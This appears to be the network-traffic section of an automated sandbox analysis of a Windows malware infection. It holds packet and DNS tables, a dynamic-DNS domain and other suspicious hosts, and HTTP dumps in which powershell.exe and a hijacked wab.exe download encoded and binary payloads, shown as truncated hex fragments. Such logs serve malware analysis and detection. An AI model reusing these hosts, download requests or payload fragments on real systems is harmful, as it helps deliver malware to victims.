                              May 31, 2024 08:10:17.124931097 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.124936104 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.125035048 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.236552000 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.236573935 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.236637115 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.236651897 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.236684084 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.236797094 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.236819029 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.236852884 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.236857891 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.236885071 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.236905098 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.237369061 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.237422943 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.237431049 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.237441063 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.237483978 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.237575054 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.237587929 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:17.237616062 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:17.237633944 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:28.344671965 CEST | 3050 | 51547 | 178.215.236.110 | 192.168.2.6
                              May 31, 2024 08:10:28.351078033 CEST | 51547 | 3050 | 192.168.2.6 | 178.215.236.110
                              May 31, 2024 08:10:28.356092930 CEST | 3050 | 51547 | 178.215.236.110 | 192.168.2.6
                              May 31, 2024 08:10:50.689421892 CEST | 51558 | 80 | 192.168.2.6 | 137.220.252.40
                              May 31, 2024 08:10:50.694314957 CEST | 80 | 51558 | 137.220.252.40 | 192.168.2.6
                              May 31, 2024 08:10:50.694402933 CEST | 51558 | 80 | 192.168.2.6 | 137.220.252.40
                              May 31, 2024 08:10:50.697144032 CEST | 51558 | 80 | 192.168.2.6 | 137.220.252.40
                              May 31, 2024 08:10:50.701984882 CEST | 80 | 51558 | 137.220.252.40 | 192.168.2.6
                              May 31, 2024 08:10:51.477447033 CEST | 80 | 51558 | 137.220.252.40 | 192.168.2.6
                              May 31, 2024 08:10:51.477530956 CEST | 80 | 51558 | 137.220.252.40 | 192.168.2.6
                              May 31, 2024 08:10:51.477579117 CEST | 51558 | 80 | 192.168.2.6 | 137.220.252.40
                              May 31, 2024 08:10:51.482357025 CEST | 51558 | 80 | 192.168.2.6 | 137.220.252.40
                              May 31, 2024 08:10:51.487171888 CEST | 80 | 51558 | 137.220.252.40 | 192.168.2.6
                              May 31, 2024 08:10:58.870346069 CEST | 3050 | 51547 | 178.215.236.110 | 192.168.2.6
                              May 31, 2024 08:10:58.871705055 CEST | 51547 | 3050 | 192.168.2.6 | 178.215.236.110
                              May 31, 2024 08:10:58.876672029 CEST | 3050 | 51547 | 178.215.236.110 | 192.168.2.6
                              May 31, 2024 08:11:06.599477053 CEST | 51559 | 80 | 192.168.2.6 | 37.235.104.9
                              May 31, 2024 08:11:06.604564905 CEST | 80 | 51559 | 37.235.104.9 | 192.168.2.6
                              May 31, 2024 08:11:06.604660988 CEST | 51559 | 80 | 192.168.2.6 | 37.235.104.9
                              May 31, 2024 08:11:06.606436968 CEST | 51559 | 80 | 192.168.2.6 | 37.235.104.9
                              May 31, 2024 08:11:06.611294985 CEST | 80 | 51559 | 37.235.104.9 | 192.168.2.6
                              May 31, 2024 08:11:07.296140909 CEST | 80 | 51559 | 37.235.104.9 | 192.168.2.6
                              May 31, 2024 08:11:07.296998978 CEST | 80 | 51559 | 37.235.104.9 | 192.168.2.6
                              May 31, 2024 08:11:07.297075033 CEST | 51559 | 80 | 192.168.2.6 | 37.235.104.9
                              May 31, 2024 08:11:08.114021063 CEST | 51559 | 80 | 192.168.2.6 | 37.235.104.9
                              May 31, 2024 08:11:08.208479881 CEST | 51550 | 80 | 192.168.2.6 | 178.237.33.50
                              May 31, 2024 08:11:08.208553076 CEST | 51544 | 80 | 192.168.2.6 | 194.59.30.6
                              May 31, 2024 08:11:08.582822084 CEST | 51550 | 80 | 192.168.2.6 | 178.237.33.50
                              May 31, 2024 08:11:08.613950968 CEST | 51544 | 80 | 192.168.2.6 | 194.59.30.6
                              May 31, 2024 08:11:09.192347050 CEST | 51550 | 80 | 192.168.2.6 | 178.237.33.50
                              May 31, 2024 08:11:09.218169928 CEST | 51544 | 80 | 192.168.2.6 | 194.59.30.6
                              May 31, 2024 08:11:10.397077084 CEST | 51550 | 80 | 192.168.2.6 | 178.237.33.50
                              May 31, 2024 08:11:10.427078009 CEST | 51544 | 80 | 192.168.2.6 | 194.59.30.6
                              May 31, 2024 08:11:10.500684977 CEST | 51561 | 80 | 192.168.2.6 | 37.235.104.9
                              May 31, 2024 08:11:11.504563093 CEST | 51561 | 80 | 192.168.2.6 | 37.235.104.9
                              May 31, 2024 08:11:11.758122921 CEST | 80 | 51561 | 37.235.104.9 | 192.168.2.6
                              May 31, 2024 08:11:11.758155107 CEST | 80 | 51561 | 37.235.104.9 | 192.168.2.6
                              May 31, 2024 08:11:11.758234978 CEST | 51561 | 80 | 192.168.2.6 | 37.235.104.9
                              May 31, 2024 08:11:11.760797977 CEST | 51561 | 80 | 192.168.2.6 | 37.235.104.9
                              May 31, 2024 08:11:11.765670061 CEST | 80 | 51561 | 37.235.104.9 | 192.168.2.6
                              May 31, 2024 08:11:12.544970989 CEST | 80 | 51561 | 37.235.104.9 | 192.168.2.6
                              May 31, 2024 08:11:12.544991016 CEST | 80 | 51561 | 37.235.104.9 | 192.168.2.6
                              May 31, 2024 08:11:12.545042992 CEST | 51561 | 80 | 192.168.2.6 | 37.235.104.9
                              May 31, 2024 08:11:12.801434040 CEST | 51550 | 80 | 192.168.2.6 | 178.237.33.50
                              May 31, 2024 08:11:12.832707882 CEST | 51544 | 80 | 192.168.2.6 | 194.59.30.6
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              May 31, 2024 08:09:33.670591116 CEST | 53 | 61525 | 162.159.36.2 | 192.168.2.6
                              May 31, 2024 08:09:34.148000956 CEST | 52562 | 53 | 192.168.2.6 | 1.1.1.1
                              May 31, 2024 08:09:34.155992985 CEST | 53 | 52562 | 1.1.1.1 | 192.168.2.6
                              May 31, 2024 08:09:35.189214945 CEST | 53839 | 53 | 192.168.2.6 | 1.1.1.1
                              May 31, 2024 08:09:35.196681023 CEST | 53 | 53839 | 1.1.1.1 | 192.168.2.6
                              May 31, 2024 08:09:37.729357004 CEST | 55536 | 53 | 192.168.2.6 | 1.1.1.1
                              May 31, 2024 08:09:37.850836992 CEST | 53 | 55536 | 1.1.1.1 | 192.168.2.6
                              May 31, 2024 08:09:38.701322079 CEST | 57617 | 53 | 192.168.2.6 | 1.1.1.1
                              May 31, 2024 08:09:38.709060907 CEST | 53 | 57617 | 1.1.1.1 | 192.168.2.6
                              May 31, 2024 08:09:43.475878954 CEST | 64898 | 53 | 192.168.2.6 | 1.1.1.1
                              May 31, 2024 08:09:43.546741009 CEST | 53 | 64898 | 1.1.1.1 | 192.168.2.6
                              May 31, 2024 08:10:50.021646023 CEST | 58916 | 53 | 192.168.2.6 | 1.1.1.1
                              May 31, 2024 08:10:50.682832956 CEST | 53 | 58916 | 1.1.1.1 | 192.168.2.6
                              May 31, 2024 08:11:06.529664040 CEST | 62874 | 53 | 192.168.2.6 | 1.1.1.1
                              May 31, 2024 08:11:06.597244024 CEST | 53 | 62874 | 1.1.1.1 | 192.168.2.6
                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                              May 31, 2024 08:09:34.148000956 CEST | 192.168.2.6 | 1.1.1.1 | 0xdaf5 | Standard query (0) | 171.39.242.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                              May 31, 2024 08:09:35.189214945 CEST | 192.168.2.6 | 1.1.1.1 | 0xde10 | Standard query (0) | 103.169.127.40.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                              May 31, 2024 08:09:37.729357004 CEST | 192.168.2.6 | 1.1.1.1 | 0xe89c | Standard query (0) | jgbours284hawara02.duckdns.org | A (IP address) | IN (0x0001) | false
                              May 31, 2024 08:09:38.701322079 CEST | 192.168.2.6 | 1.1.1.1 | 0xaa4 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                              May 31, 2024 08:09:43.475878954 CEST | 192.168.2.6 | 1.1.1.1 | 0xc5b4 | Standard query (0) | ramirex.ro | A (IP address) | IN (0x0001) | false
                              May 31, 2024 08:10:50.021646023 CEST | 192.168.2.6 | 1.1.1.1 | 0x5107 | Standard query (0) | www.387mfyr.sbs | A (IP address) | IN (0x0001) | false
                              May 31, 2024 08:11:06.529664040 CEST | 192.168.2.6 | 1.1.1.1 | 0x9513 | Standard query (0) | www.led-svitidla.eu | A (IP address) | IN (0x0001) | false
                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                              May 31, 2024 08:09:34.155992985 CEST | 1.1.1.1 | 192.168.2.6 | 0xdaf5 | Name error (3) | 171.39.242.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                              May 31, 2024 08:09:35.196681023 CEST | 1.1.1.1 | 192.168.2.6 | 0xde10 | Name error (3) | 103.169.127.40.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                              May 31, 2024 08:09:37.850836992 CEST | 1.1.1.1 | 192.168.2.6 | 0xe89c | No error (0) | jgbours284hawara02.duckdns.org | | 178.215.236.110 | A (IP address) | IN (0x0001) | false
                              May 31, 2024 08:09:38.709060907 CEST | 1.1.1.1 | 192.168.2.6 | 0xaa4 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                              May 31, 2024 08:09:43.546741009 CEST | 1.1.1.1 | 192.168.2.6 | 0xc5b4 | No error (0) | ramirex.ro | | 188.215.50.15 | A (IP address) | IN (0x0001) | false
                              May 31, 2024 08:10:50.682832956 CEST | 1.1.1.1 | 192.168.2.6 | 0x5107 | No error (0) | www.387mfyr.sbs | | 137.220.252.40 | A (IP address) | IN (0x0001) | false
                              May 31, 2024 08:11:06.597244024 CEST | 1.1.1.1 | 192.168.2.6 | 0x9513 | No error (0) | www.led-svitidla.eu | led-svitidla.eu | | CNAME (Canonical name) | IN (0x0001) | false
                              May 31, 2024 08:11:06.597244024 CEST | 1.1.1.1 | 192.168.2.6 | 0x9513 | No error (0) | led-svitidla.eu | | 37.235.104.9 | A (IP address) | IN (0x0001) | false
                              • ramirex.ro
                              • 194.59.30.6
                              • geoplugin.net
                              • www.387mfyr.sbs
                              • www.led-svitidla.eu
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.6 | 49712 | 194.59.30.6 | 80 | 2084 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Timestamp | Bytes transferred | Direction | Data
                              May 31, 2024 08:09:05.310576916 CEST | 166 | OUT | GET /Uncomic.mdp HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: 194.59.30.6
                              Connection: Keep-Alive
                              May 31, 2024 08:09:06.104875088 CEST | 1236 | IN | HTTP/1.1 200 OK
                              Date: Fri, 31 May 2024 06:09:05 GMT
                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                              Last-Modified: Wed, 29 May 2024 11:36:06 GMT
                              ETag: "70c18-6199627fa2108"
                              Accept-Ranges: bytes
                              Content-Length: 461848
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Data Raw: 63 51 47 62 36 77 4c 46 6b 4c 76 54 39 52 45 41 36 77 49 73 44 58 45 42 6d 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 35 55 49 71 37 33 45 42 6d 33 45 42 6d 34 48 42 78 74 2f 71 41 33 45 42 6d 2b 73 43 4b 51 69 42 77 56 58 64 36 67 7a 72 41 73 64 49 63 51 47 62 36 77 4b 68 65 33 45 42 6d 37 6f 49 4b 47 6c 6c 36 77 49 6b 34 4f 73 43 47 73 4a 78 41 5a 74 78 41 5a 73 78 79 75 73 43 46 71 35 78 41 5a 75 4a 46 41 76 72 41 6d 54 54 36 77 4a 2f 66 4e 48 69 36 77 4b 70 2b 48 45 42 6d 34 50 42 42 4f 73 43 74 4b 6a 72 41 74 78 43 67 66 6e 74 6a 4f 34 42 66 4d 72 72 41 73 49 73 63 51 47 62 69 30 51 6b 42 4f 73 43 4f 73 74 78 41 5a 75 4a 77 2b 73 43 46 44 70 78 41 5a 75 42 77 36 36 55 4d 41 48 72 41 6c 78 41 36 77 49 6d 4d 72 71 63 2b 41 32 59 36 77 4a 61 67 65 73 43 71 4f 71 42 38 6d 52 74 56 36 56 78 41 5a 74 78 41 5a 75 42 36 76 69 56 57 6a 31 78 41 5a 74 78 41 5a 76 72 41 73 30 73 36 77 4c 77 70 58 45 42 6d 2b 73 43 70 67 32 4c 44 42 44 72 41 73 5a 74 63 51 47 62 69 51 77 54 36 77 4c 46 4f 65 73 43 70 61 [TRUNCATED]
                              Data Ascii: cQGb6wLFkLvT9REA6wIsDXEBmwNcJARxAZtxAZu55UIq73EBm3EBm4HBxt/qA3EBm+sCKQiBwVXd6gzrAsdIcQGb6wKhe3EBm7oIKGll6wIk4OsCGsJxAZtxAZsxyusCFq5xAZuJFAvrAmTT6wJ/fNHi6wKp+HEBm4PBBOsCtKjrAtxCgfntjO4BfMrrAsIscQGbi0QkBOsCOstxAZuJw+sCFDpxAZuBw66UMAHrAlxA6wImMrqc+A2Y6wJagesCqOqB8mRtV6VxAZtxAZuB6viVWj1xAZtxAZvrAs0s6wLwpXEBm+sCpg2LDBDrAsZtcQGbiQwT6wLFOesCpaZC6wLWXesCpOyB+ujVBAB10+sClrNxAZuJXCQMcQGbcQGbge0AAwAAcQGbcQGbi1QkCHEBm3EBm4t8JATrAkyf6wJcdInr6wJ0gXEBm4HDnAAAAHEBm3EBm1NxAZtxAZtqQOsCFdRxAZuJ6+sC/c3rAuBax4MAAQAAAJADAusCL5BxAZuBwwABAABxAZtxAZtTcQGbcQGbietxAZvrAkRcibsEAQAAcQGb6wK1bIHDBAEAAHEBm3EBm1PrAu9b6wJF2mr/cQGbcQGbg8IFcQGbcQGbMfbrAnCScQGbMclxAZtxAZuLGusChGzrAn4VQXEBm3EBmzkcCnX06wKbtOsC2kRGcQGb6wKro4B8Cvu4dd1xAZvrAuKHi0QK/HEBm3EBmynw6wInrusCUzf/0nEBm3EBm7ro1QQA6wL66XEBmzHAcQGb6wIek4t8JAzrAt8ocQGbgTQHsFDD9HEBm3EBm4PABHEBm3EBmznQdebrAv7qcQGbiftxAZvrAt8L/9dxAZvrAiCuNZNKETG8BLgpUEIwdxla9OXZJk00fcKsMbnCghpEQh1N/OOrMbmt/oa0lUqgO0KvMa5v9LBQzHC0lMf07peH+bC
                              May 31, 2024 08:09:06.104978085 CEST | 224 | IN | Data Raw: 79 61 56 48 6f 30 44 71 37 4d 53 54 4f 39 50 4e 77 6d 62 77 78 46 4d 37 30 4d 79 6f 78 77 68 67 55 51 70 69 39 55 4f 66 78 51 68 64 48 41 44 47 52 69 6a 4f 35 56 55 49 64 39 5a 66 4b 38 54 53 41 42 48 47 48 55 73 50 30 46 53 78 6f 49 7a 48 6c 39
                              Data Ascii: yaVHo0Dq7MSTO9PNwmbwxFM70MyoxwhgUQpi9UOfxQhdHADGRijO5VUId9ZfK8TSABHGHUsP0FSxoIzHl9PawUEQONoFGNdb5SrIx1fT2sFCvUJa1QkGHUsP0RnuXH4mY+ySL3fT2sFDMccqvPAtGlLaSNYFHEjSsSnHIUcP0NL1HEoi1Smn8UcP0MS2/3txQw/s0EVf0sAP7CTSbK217VMMfgINrnRr
                              May 31, 2024 08:09:06.105010986 CEST | 1236 | IN | Data Raw: 65 33 73 6b 78 78 50 71 43 53 6b 4d 4f 73 51 39 69 41 6d 38 35 41 37 56 39 6e 6f 4e 72 6e 52 72 65 33 73 6b 78 78 50 71 43 53 6b 4d 4f 73 51 39 69 41 6d 38 35 41 37 56 39 6e 74 6d 47 73 44 57 44 4b 6c 38 67 56 4d 4e 37 4e 54 54 43 39 4c 43 6e 41
                              Data Ascii: e3skxxPqCSkMOsQ9iAm85A7V9noNrnRre3skxxPqCSkMOsQ9iAm85A7V9ntmGsDWDKl8gVMN7NTTC9LCnAPoFe+Cc3+5nQ1hGVPCw2Z7oNZN7zq97X5IxrvWChRRlwsplDWwNvvZ9lPDLzXM2NDXkzki5rOrPTtz6Qg30zXbSWI9P8LDZhtw7Hd9O1Zx/ZtbVGhx83Mf0NLRKcXhQw/QxLb8zNFDD+zTVUPSwuaIztFA0MjS2bb
                              May 31, 2024 08:09:06.105070114 CEST | 1236 | IN | Data Raw: 65 77 39 33 4e 74 2f 61 53 66 7a 31 31 77 66 53 77 6e 45 5a 34 39 39 50 47 77 55 45 34 78 51 36 56 66 73 39 45 74 58 6a 76 78 42 4c 79 55 2f 6f 56 75 49 4b 46 73 6c 43 55 53 31 31 33 76 61 51 78 6c 77 53 69 74 70 74 43 41 38 50 31 31 43 73 78 70
                              Data Ascii: ew93Nt/aSfz11wfSwnEZ499PGwUE4xQ6Vfs9EtXjvxBLyU/oVuIKFslCUS113vaQxlwSitptCA8P11Csxp1y+c5lCMxg/bAbgzEoUsWhekomLtfmrIe9hBBZNsd+JH8HS0/rCBMTZmGHFxm2tmF9yfgr8ntjBAnC2hT0cb+i3+DEtt5z9UMP7NKFg9LAIQonM8rj0sF9HAz9Qw6vY6BnyRV/K4CxQw/SwUMP0sFDD9LBQw/QSud
                              May 31, 2024 08:09:06.105110884 CEST | 1236 | IN | Data Raw: 55 42 75 5a 44 62 48 41 76 73 61 63 4c 42 65 37 59 6b 4e 45 6f 41 47 6e 54 6a 33 56 62 4e 62 78 54 59 39 6e 77 4e 67 52 57 61 2b 4e 69 36 34 79 63 66 38 42 66 4e 70 4b 45 52 6d 49 74 55 6a 4c 31 4a 30 32 59 71 5a 54 64 2f 62 72 42 77 63 6f 5a 32
                              Data Ascii: UBuZDbHAvsacLBe7YkNEoAGnTj3VbNbxTY9nwNgRWa+Ni64ycf8BfNpKERmItUjL1J02YqZTd/brBwcoZ2nOnWeucXndUIIT28fIQ8lj0F2nFjVguHyarh7Z6f3WEdEJXUm8PZJGb0yeX6zZLCX24lD5PEbtu9PYbQBcQIpcXc+4xZOdEdTBcpgo331fl0TGU+0FddUKcPgxL0TF+rPdidXLviebeA199U1nQaYiRvOYeqql3mQ
                              May 31, 2024 08:09:06.105145931 CEST | 672 | IN | Data Raw: 74 41 65 69 6a 59 73 63 31 4a 49 63 50 30 31 43 64 64 55 47 41 45 4d 2b 48 30 54 4b 64 46 41 39 52 70 54 76 64 77 50 61 77 55 4b 76 34 42 38 64 67 66 54 58 54 77 76 53 77 36 48 7a 61 4e 67 72 47 6a 56 2f 55 48 4b 4d 50 4b 61 59 55 6f 4e 45 45 79
                              Data Ascii: tAeijYsc1JIcP01CddUGAEM+H0TKdFA9RpTvdwPawUKv4B8dgfTXTwvSw6HzaNgrGjV/UHKMPKaYUoNEEyc5ZPXVf9o1+Q9EE7czwJ32vLaePql3LoIv23r4Be03Ng3xRDh5Yrxd5Mtq++shhTD3xvuh46DGrhaxOowZ9bWfs3JFOjiZtIDGiykFeJ0I2bTt8qDlK+9bneXMWNbQGxzZfs1HzYmds/XGzi4r3dXxCwW4c+/mZpD
                              May 31, 2024 08:09:06.105185986 CEST | 672 | IN | Data Raw: 74 41 65 69 6a 59 73 63 31 4a 49 63 50 30 31 43 64 64 55 47 41 45 4d 2b 48 30 54 4b 64 46 41 39 52 70 54 76 64 77 50 61 77 55 4b 76 34 42 38 64 67 66 54 58 54 77 76 53 77 36 48 7a 61 4e 67 72 47 6a 56 2f 55 48 4b 4d 50 4b 61 59 55 6f 4e 45 45 79
                              Data Ascii: tAeijYsc1JIcP01CddUGAEM+H0TKdFA9RpTvdwPawUKv4B8dgfTXTwvSw6HzaNgrGjV/UHKMPKaYUoNEEyc5ZPXVf9o1+Q9EE7czwJ32vLaePql3LoIv23r4Be03Ng3xRDh5Yrxd5Mtq++shhTD3xvuh46DGrhaxOowZ9bWfs3JFOjiZtIDGiykFeJ0I2bTt8qDlK+9bneXMWNbQGxzZfs1HzYmds/XGzi4r3dXxCwW4c+/mZpD
                              May 31, 2024 08:09:06.105216980 CEST | 1236 | IN | Data Raw: 47 31 30 67 35 51 76 43 55 6e 2f 38 62 76 31 2f 44 34 35 68 51 77 2f 53 77 55 4d 50 30 73 46 44 44 39 4c 42 51 77 2f 51 39 6d 48 70 44 2b 30 6e 6c 51 78 5a 64 46 2f 4a 32 72 42 63 68 6b 6e 78 45 43 62 43 6a 4c 69 74 76 36 6e 4a 4d 6b 6b 52 73 56
                              Data Ascii: G10g5QvCUn/8bv1/D45hQw/SwUMP0sFDD9LBQw/Q9mHpD+0nlQxZdF/J2rBchknxECbCjLitv6nJMkkRsVj63qz7i6tY88mpCNlZRxA4xorz++WRK9iOwIpJoH+3CiZHNU6YXmrE3x+14NJDEIXAtcX1I+kOa9SsOadsZK9TDdIKu2LhgRlWcRZbQ60tXkcaTlYB3yxHWOK9eKzGCYc+p613JSjQiV8dKYWlRw/QK1bEDIJwM6N
                              May 31, 2024 08:09:06.105252981 CEST | 224 | IN | Data Raw: 62 30 53 51 78 75 59 69 64 56 41 4e 43 42 61 64 77 74 71 41 78 75 55 61 6d 52 43 61 56 61 44 6d 32 77 76 6f 74 61 42 6d 4f 6c 6c 48 32 4e 79 44 31 2f 42 2b 65 7a 31 69 78 4c 51 74 77 51 73 6d 67 53 4e 4b 66 49 4f 2f 62 6f 6e 52 64 33 73 67 2b 57
                              Data Ascii: b0SQxuYidVANCBadwtqAxuUamRCaVaDm2wvotaBmOllH2NyD1/B+ez1ixLQtwQsmgSNKfIO/bonRd3sg+WTkUA+kaHB5Hn/Wsjfb489gpNYOdzWoJQhoxADTgv5f5fLBQw/SwUMP0sFDD9LBQw39BpQOWJLGtpCc+kZUkRSKudyggZgkQX9rvK5DUOtE1WGwRrXV2FGJGAgZ9xtpbdnVGvYmJBtE15qx
                              May 31, 2024 08:09:06.105282068 CEST | 1236 | IN | Data Raw: 6a 67 58 56 47 7a 58 6a 46 59 39 45 31 70 44 59 6b 55 61 4d 73 32 53 54 31 68 38 33 36 4a 63 31 42 6e 63 64 72 4e 68 75 57 48 49 72 30 55 66 51 71 63 43 4d 6a 48 72 46 39 44 4f 57 2f 5a 31 74 2b 67 4e 62 32 37 77 6b 39 55 32 66 58 37 2f 46 77 75
                              Data Ascii: jgXVGzXjFY9E1pDYkUaMs2ST1h836Jc1BncdrNhuWHIr0UfQqcCMjHrF9DOW/Z1t+gNb27wk9U2fX7/FwuVFzHWGxdBqOVJY0Us17D0ck7tlWz7JQw6cLjUtQzdEw1yt30HVz0DVReNEAMBuHC32rQjV8Dk62yk3kn3bRZhPyoq9WaDrsNHlBduh4ua94ZUnT16qZ9YuO7gXrs8GTmE5/ZXcIv1HTabBQw/SwUMP0sFDD9LBQw1
                              May 31, 2024 08:09:06.105317116 CEST | 1236 | IN | Data Raw: 42 2b 43 6a 5a 78 49 4e 32 53 70 32 75 63 52 71 46 42 31 39 39 56 31 6e 45 61 64 62 56 43 6f 47 53 2b 61 78 66 32 37 78 37 66 4f 6e 69 79 6e 59 74 59 65 63 51 38 78 39 53 2b 6a 38 41 4f 4a 6a 48 49 5a 51 39 31 30 35 46 75 6c 71 32 53 69 41 61 43
                              Data Ascii: B+CjZxIN2Sp2ucRqFB199V1nEadbVCoGS+axf27x7fOniynYtYecQ8x9S+j8AOJjHIZQ9105Fulq2SiAaCRFkVkKRTif9ANgzqtj7PBtt8LAKnMxHCKs8IFDd+7FAivSwUMP0sFDD9LBQw/SwUFjl9NmVc8qg6FXq2RLcMWTnHn39mDiXKzEMDt4yoQ9VpylUkLtXYqVuHYLfQvCUUBRXXNH30JJkksbn77j1O59CAw8J7Ksxpy


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              1 | 192.168.2.6 | 51544 | 194.59.30.6 | 80 | 7108 | C:\Program Files (x86)\Windows Mail\wab.exe
                              Timestamp | Bytes transferred | Direction | Data
                              May 31, 2024 08:09:35.158371925 CEST | 171 | OUT | GET /UWYVFXQWh32.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: 194.59.30.6
                              Cache-Control: no-cache
                              May 31, 2024 08:09:35.811597109 CEST | 1236 | IN | HTTP/1.1 200 OK
                              Date: Fri, 31 May 2024 06:09:35 GMT
                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                              Last-Modified: Sun, 26 May 2024 13:26:30 GMT
                              ETag: "78c40-6195b593ec35c"
                              Accept-Ranges: bytes
                              Content-Length: 494656
                              Content-Type: application/octet-stream
                              Data Raw: d4 42 f3 67 67 9c 74 9f e3 fe 03 c0 17 a5 77 b6 fc f6 bf 05 24 a4 44 da 89 23 dc 7b 5c b7 36 c9 33 dc 5c df 71 73 cc 3d dd 28 1d 75 8c bd 65 a5 94 86 1e a4 55 53 d0 25 a9 65 8e 61 4f f1 38 b2 3c aa b5 5a 58 60 0b 50 01 e6 c2 52 87 94 da 18 d4 7e a7 6a f7 d8 92 94 9f 51 49 f7 58 1b fb 80 84 ec 11 d1 2a e5 00 b6 5b d5 42 04 48 c4 67 de 0e bc ea 23 b9 4b f6 f1 a6 7b c9 be c7 5e c6 89 77 9a 5b cc 91 23 76 3f 40 b5 07 26 9c 62 af 4c a6 18 98 b4 51 cc 9f 9f b2 31 73 2b 71 90 e4 6a cf 11 f4 d6 21 9e 63 e3 3b 70 c0 6f 89 c5 fa 6b 6a c0 7e d5 60 3f ed 73 5f 9d d3 4c 33 31 b0 fb 46 42 e9 75 1d ef 1e 73 40 14 77 96 30 7d 11 a5 51 99 8a 2f c0 09 ab 4d 4d 02 3e 65 3b c8 18 55 9c c3 4a b5 81 7d 1a 23 cf ac 02 a4 aa 06 3c 1e 9e 92 de 91 bf f6 c5 8c 4c 03 cb 43 98 d7 e1 5d cb d9 ae eb d9 7e eb b2 22 20 01 79 12 ee 68 f2 75 7d 99 01 66 9f 37 fc 29 ae 95 9b 41 a1 c5 8a c7 08 45 dd 3a ad 66 68 75 94 f7 32 5e 00 c2 3a 68 71 45 d1 44 96 ab 57 c1 93 f0 a6 dc d2 69 c1 5e eb be 18 34 2c 87 ed a5 3f f2 4d c0 a2 49 11 e9 47 [TRUNCATED]
                              Data Ascii: Bggtw$D#{\63\qs=(ueUS%eaO8<ZX`PR~jQIX*[BHg#K{^w[#v?@&bLQ1s+qj!c;pokj~`?s_L31FBus@w0}Q/MM>e;UJ}#<LC]~" yhu}f7)AE:fhu2^:hqEDWi^4,?MIGi9rc/|#F|;wC@\e#WX xV-O)R,l3:KiXq^-R(E-rU]i3+p=c[K9Ouf^y8mTS2p')4P2aY,D~L%.=dgb~dl%FlHaTDM6txRY),S^M1->f^*Xq^cPZU*:D%(5;[}`JE&R6pj_|]eP+kaw+mbQBxS)hrU;>veLzq4&qaH1}&nQPdYw?x~n#)Eh#CF1LXi/35I)%y%]0mJcnh'wN]1Z@ _HgyU}+O:?<AZ{J$Vgh07{}`
                              May 31, 2024 08:09:35.811613083 CEST | 224 | IN | Data Raw: 38 2a ad e5 47 fc b0 91 74 39 0d 24 01 ec 78 bf be a8 2e 88 f5 94 a1 0d 99 26 12 5f de 32 23 7a 3e 1b 27 f7 01 c2 c1 68 42 29 6d db 69 b2 95 fb 62 27 66 40 e5 33 fd 8d 0b 07 b6 68 01 f3 8c db 6b a7 2c 58 27 b8 d9 de 8c 92 71 68 b8 52 d3 c2 20 5b
                              Data Ascii: 8*Gt9$x.&_2#z>'hB)mib'f@3hk,X'qhR [37RuJL\Lhp^3=nE)Rk ?#^t0Rj<gX&[Nf}LH{B7\>q
                              May 31, 2024 08:09:35.811656952 CEST | 1236 | IN | Data Raw: e1 75 08 bf ef 8d 99 95 b1 c5 f1 a2 93 89 2c e6 d2 8c d9 33 01 ec 6f d4 27 f0 38 99 67 ea a5 bd ce b3 2d 7a f8 71 91 81 c6 e5 9b 3a 8a 94 84 65 61 0a 1b 06 01 56 3c b6 57 34 68 e2 99 b2 4d 7f bc 96 81 98 8a e8 72 4f a8 c8 13 50 2d b6 02 ab 1d c4
                              Data Ascii: u,3o'8g-zq:eaV<W4hMrOP-14CH=+f@n[QI53Nbc B-Q u^*j#t@\UB!Y)=u0=.>(})!!H:cn{9:X4p*s
